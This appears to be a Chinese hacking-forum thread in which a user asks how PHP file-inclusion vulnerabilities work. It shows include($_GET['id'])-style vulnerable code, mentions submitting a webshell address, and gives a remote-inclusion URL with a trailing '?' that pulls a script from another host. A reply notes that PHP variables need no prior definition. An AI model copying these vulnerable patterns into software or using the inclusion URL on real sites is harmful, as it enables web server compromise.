[讨论]php文件包含的问题
[讨论]php文件包含的问题议题作者:消失再消失
信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com/]www.eviloctal.com[/url])
老是弄不懂这种漏洞是怎么来的,网上的包含漏洞介绍大约都是这样一段代码:
....
$id=$_GET["id"];
include($id);
....
因为变量id能被人为任意控制,所以造成了包含漏洞。
这里很容易理解。
但是看别人发布的文件包含漏洞是基本是这样类型的代码:
....
include_once $edp_relative_path."admin/serverdata.php";
....
只要向变量edp_relative_path提交一个webshell的地址,就能执行webshell了。
这里就不明白了,edp_relative_path这个变量是怎么来的?为什么可以人为控制?
我找了很久关于edp_relative_path这个变量的代码,都没有发现是哪里赋的值。
还有就是,为什么有些远程包含漏洞在包含了文件之后还要加一个“?”啊?如“[url=http://www.bajinzhi.net/l.php?i=http://bbb.com/love.php?]http://www.bajinzhi.net/l.php?i=http://bbb.com/love.php?[/url]”
请高人指点啊小鸡鸡重出江湖了~~!!
帖子119 精华[url=http://forum.eviloctal.com/digest.php?authorid=133543]0[/url] 积分3244 阅读权限100 性别男 在线时间143 小时 注册时间2007-7-31 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=133543]查看详细资料[/url][url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=33549&pid=145695&page=1]报告[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-6319.html]dingking[/url] [img]http://forum.eviloctal.com/customavatars/6319.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 貌似PHP中不需要先定义变量的。~直接 $xxx 就可以用了。~。~~
include_once $edp_relative_path."admin/serverdata.php"; 直接定义就赋值了.....
~~[img]http://forum.eviloctal.com/images/smilies/tuzki/18.gif[/img]昨天是明天的前天今天是昨天的明天明天是昨天的后天 ╰o╯╰o╯
帖子741 精华[url=http://forum.eviloctal.com/digest.php?authorid=6319]2[/url] 积分4784 阅读权限100 性别男 在线时间756 小时 注册时间2005-6-17 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=6319]查看详细资料[/url][url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=33549&pid=145697&page=1]报告[/url] TOP [url=http://www.google.cn/search?q=猎头&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]您知道您年薪应是多少?[/url]
[url=http://forum.eviloctal.com/space-uid-25836.html]winger[/url] [img]http://forum.eviloctal.com/images/avatars/pw/male4.gif[/img]
晶莹剔透§烈日灼然
页:
[1]